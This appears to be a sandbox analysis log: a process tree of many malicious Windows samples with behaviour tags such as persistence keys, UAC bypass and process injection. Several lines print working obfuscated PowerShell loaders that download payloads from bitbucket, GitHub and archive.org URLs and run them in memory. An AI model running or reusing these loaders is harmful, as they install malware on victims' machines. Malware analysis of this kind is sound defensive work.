C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"C:\Users\Admin\AppData\Local\Temp\5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Roaming\Morfey.EXEC:\Users\Admin\AppData\Roaming\Morfey.EXE4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:440 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c grw.vbs5⤵PID:656
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\grw.vbs"6⤵PID:6016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DY#MQBl#HM#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#Hc#cQB0#HI#ZQB0#HI#ZQ#v#Gs#cgB1#HI#ZQBt#Gw#dQBy#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxDutionpolicy bypass -Noprofile -command $OWjuxD"7⤵
- Command and Scripting Interpreter: PowerShell
PID:2212
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"3⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\Iakiia32.exeC:\Windows\system32\Iakiia32.exe4⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\Ikcmbfcj.exeC:\Windows\system32\Ikcmbfcj.exe5⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\Ihgnkkbd.exeC:\Windows\system32\Ihgnkkbd.exe6⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\Jnhpoamf.exeC:\Windows\system32\Jnhpoamf.exe7⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\SysWOW64\Knbbep32.exeC:\Windows\system32\Knbbep32.exe8⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1452 -
C:\Windows\SysWOW64\Kgamnded.exeC:\Windows\system32\Kgamnded.exe9⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1016 -
C:\Windows\SysWOW64\Mahnhhod.exeC:\Windows\system32\Mahnhhod.exe10⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3244 -
C:\Windows\SysWOW64\Mblcnj32.exeC:\Windows\system32\Mblcnj32.exe11⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4496 -
C:\Windows\SysWOW64\Nbcjnilj.exeC:\Windows\system32\Nbcjnilj.exe12⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1676 -
C:\Windows\SysWOW64\Nknobkje.exeC:\Windows\system32\Nknobkje.exe13⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2316 -
C:\Windows\SysWOW64\Objpoh32.exeC:\Windows\system32\Objpoh32.exe14⤵PID:400
-
C:\Windows\SysWOW64\Ohkbbn32.exeC:\Windows\system32\Ohkbbn32.exe15⤵PID:5060
-
C:\Windows\SysWOW64\Piphgq32.exeC:\Windows\system32\Piphgq32.exe16⤵PID:2728
-
C:\Windows\SysWOW64\Pcobaedj.exeC:\Windows\system32\Pcobaedj.exe17⤵PID:5236
-
C:\Windows\SysWOW64\Ajpqnneo.exeC:\Windows\system32\Ajpqnneo.exe18⤵PID:5504
-
C:\Windows\SysWOW64\Acokhc32.exeC:\Windows\system32\Acokhc32.exe19⤵PID:5720
-
C:\Windows\SysWOW64\Bkoigdom.exeC:\Windows\system32\Bkoigdom.exe20⤵PID:5864
-
C:\Windows\SysWOW64\Cfldelik.exeC:\Windows\system32\Cfldelik.exe21⤵PID:6076
-
C:\Windows\SysWOW64\Coiaiakf.exeC:\Windows\system32\Coiaiakf.exe22⤵PID:3800
-
C:\Windows\SysWOW64\Dkdliame.exeC:\Windows\system32\Dkdliame.exe23⤵PID:2568
-
C:\Windows\SysWOW64\Ejoomhmi.exeC:\Windows\system32\Ejoomhmi.exe24⤵PID:5264
-
C:\Windows\SysWOW64\Eidlnd32.exeC:\Windows\system32\Eidlnd32.exe25⤵PID:4988
-
C:\Windows\SysWOW64\Elgaeolp.exeC:\Windows\system32\Elgaeolp.exe26⤵PID:5560
-
C:\Windows\SysWOW64\Fipkjb32.exeC:\Windows\system32\Fipkjb32.exe27⤵PID:5904
-
C:\Windows\SysWOW64\Gmbmkpie.exeC:\Windows\system32\Gmbmkpie.exe28⤵PID:5244
-
C:\Windows\SysWOW64\Gkhkjd32.exeC:\Windows\system32\Gkhkjd32.exe29⤵PID:5344
-
C:\Windows\SysWOW64\Gfokoelp.exeC:\Windows\system32\Gfokoelp.exe30⤵PID:1568
-
C:\Windows\SysWOW64\Hgdejd32.exeC:\Windows\system32\Hgdejd32.exe31⤵PID:3812
-
C:\Windows\SysWOW64\Hlhccj32.exeC:\Windows\system32\Hlhccj32.exe32⤵PID:1680
-
C:\Windows\SysWOW64\Iinqbn32.exeC:\Windows\system32\Iinqbn32.exe33⤵PID:2824
-
C:\Windows\SysWOW64\Ijegcm32.exeC:\Windows\system32\Ijegcm32.exe34⤵PID:5256
-
C:\Windows\SysWOW64\Igigla32.exeC:\Windows\system32\Igigla32.exe35⤵PID:5848
-
C:\Windows\SysWOW64\Jcbdgb32.exeC:\Windows\system32\Jcbdgb32.exe36⤵PID:2740
-
C:\Windows\SysWOW64\Jgpmmp32.exeC:\Windows\system32\Jgpmmp32.exe37⤵PID:5576
-
C:\Windows\SysWOW64\Jnlbojee.exeC:\Windows\system32\Jnlbojee.exe38⤵PID:5556
-
C:\Windows\SysWOW64\Jgeghp32.exeC:\Windows\system32\Jgeghp32.exe39⤵PID:5416
-
C:\Windows\SysWOW64\Kclgmq32.exeC:\Windows\system32\Kclgmq32.exe40⤵PID:6028
-
C:\Windows\SysWOW64\Kkeldnpi.exeC:\Windows\system32\Kkeldnpi.exe41⤵PID:3344
-
C:\Windows\SysWOW64\Kqfngd32.exeC:\Windows\system32\Kqfngd32.exe42⤵PID:6416
-
C:\Windows\SysWOW64\Lkchelci.exeC:\Windows\system32\Lkchelci.exe43⤵PID:7256
-
C:\Windows\SysWOW64\Mcqjon32.exeC:\Windows\system32\Mcqjon32.exe44⤵PID:7796
-
C:\Windows\SysWOW64\Madjhb32.exeC:\Windows\system32\Madjhb32.exe45⤵PID:7944
-
C:\Windows\SysWOW64\Mnhkbfme.exeC:\Windows\system32\Mnhkbfme.exe46⤵PID:8028
-
C:\Windows\SysWOW64\Maiccajf.exeC:\Windows\system32\Maiccajf.exe47⤵PID:8128
-
C:\Windows\SysWOW64\Mjahlgpf.exeC:\Windows\system32\Mjahlgpf.exe48⤵PID:6388
-
C:\Windows\SysWOW64\Mjdebfnd.exeC:\Windows\system32\Mjdebfnd.exe49⤵PID:4572
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Nummmeret=Get-Content 'C:\Users\Admin\AppData\Local\Temp\forgrovelse\konstituerendes\Printermanualens.Ear';$Trojanerens=$Nummmeret.SubString(42833,3);.$Trojanerens($Nummmeret) "4⤵
- Command and Scripting Interpreter: PowerShell
PID:4348
-
-
-
C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\VCREDI~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\VCREDI~2.EXE4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4980 -
C:\Windows\SysWOW64\msiexec.exemsiexec /i vcredist.msi5⤵
- Event Triggered Execution: Installer Packages
PID:5184
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3172 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe4⤵PID:2000
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe5⤵PID:3284
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"5⤵PID:6084
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"5⤵PID:5388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3688 -
C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exeC:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe /C4⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Local\Temp\gold.exe"C:\Users\Admin\AppData\Local\Temp\gold.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3904
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SW5WT0tlLWV4UFJlU1NJT04oKCc2SGMnKyd1JysncicrJ2wgPScrJyAnKydNUlBodHRwczonKycvL2lhJysnNicrJzAwMTAwLnUnKydzLmEnKydyYycrJ2hpJysndicrJ2UuJysnb3InKydnLzI0L2knKyd0ZW1zL2QnKydldGFoLW5vdGUtdi9EJysnZXQnKydhaE5vdGVWLnQnKyd4JysndCcrJ01SUCcrJzs2SGNiYXNlJysnNjRDb250JysnZW50JysnID0gKE5lJysndy1PYmplJysnY3QgUycrJ3lzdGVtLk5ldC5XZScrJ2JDJysnbGknKydlbnQpLkRvd24nKydsJysnb2FkJysnU3RyaW4nKydnJysnKDYnKydIJysnY3UnKydyJysnbCcrJyknKyc7NkhjYmluJysnYXJ5QycrJ29udGVudCA9ICcrJ1tTeXN0ZW0uQ29uJysndmVydF06OkZybycrJ20nKydCYXMnKydlNjQnKydTJysndHInKydpbmcoNkhjYmFzZTYnKyc0Q29udGVudCk7NicrJ0gnKydjYXNzZW1ibHknKycgPSBbUicrJ2VmbGUnKydjdGlvJysnbi5Bc3MnKydlJysnbWJseScrJ10nKyc6OkwnKydvJysnYWQnKycoNkhjJysnYmknKyduYXJ5QycrJ28nKydudGVudCk7NkgnKydjdHlwZScrJyA9JysnICcrJzZIYycrJ2Fzc2VtYicrJ2x5LkdldFR5JysncGUoTScrJ1JQUicrJ3VuUEUuSG8nKydtZScrJ00nKydSUCcrJyk7NkgnKydjbWV0aG8nKydkJysnICcrJz0nKycgJysnNicrJ0hjJysndHknKydwJysnZS5HZXRNJysnZXRoJysnb2QoTVInKydQJysnVkFJTVJQKScrJzs2SGMnKydtZScrJ3QnKydob2QuSW52b2tlKDZIJysnY24nKyd1JysnbGwsIFtvYmplYycrJ3RbXV1AKE0nKydSJysnUHR4dC4nKyd5YScrJ2Rub20vdmUnKydkLjInKydyLjMnKyc5YjM0NTMwJysnMmEwNzViMWJjMGQ0JysnNWInKyc2MycrJzJlYjllZTYyLWJ1cC8nKycvOnNwJysndHRoTVJQICwgTVJQZGVzYXQnKydpJysndicrJ2FkbycrJ01SUCAsIE0nKydSUCcrJ2Rlc2F0aXYnKydhZCcrJ29NUicrJ1AgLCBNUlBkZXMnKydhdGl2YScrJ2RvTVJQLE1SUEEnKydkZEknKyduUHJvY2VzczMnKycyTVJQJysnLE0nKydSJysnUE1SUCkpJykuUmVQbGFjRSgnNkhjJyxbU3RSaW5HXVtDSEFSXTM2KS5SZVBsYWNFKChbQ0hBUl03NytbQ0hBUl04MitbQ0hBUl04MCksW1N0UmluR11bQ0hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
PID:5824
-
-
-
C:\Users\Admin\AppData\Local\Temp\l6E.exe"C:\Users\Admin\AppData\Local\Temp\l6E.exe"3⤵PID:2204
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"3⤵PID:3876
-
C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"4⤵PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\tt.exe"C:\Users\Admin\AppData\Local\Temp\tt.exe"3⤵PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"3⤵PID:2696
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"3⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"4⤵PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Py017394- 01.htm4⤵PID:5756
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb98243cb8,0x7ffb98243cc8,0x7ffb98243cd85⤵PID:3232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:25⤵PID:3472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:35⤵PID:2220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:85⤵PID:6180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:15⤵PID:6360
-
-
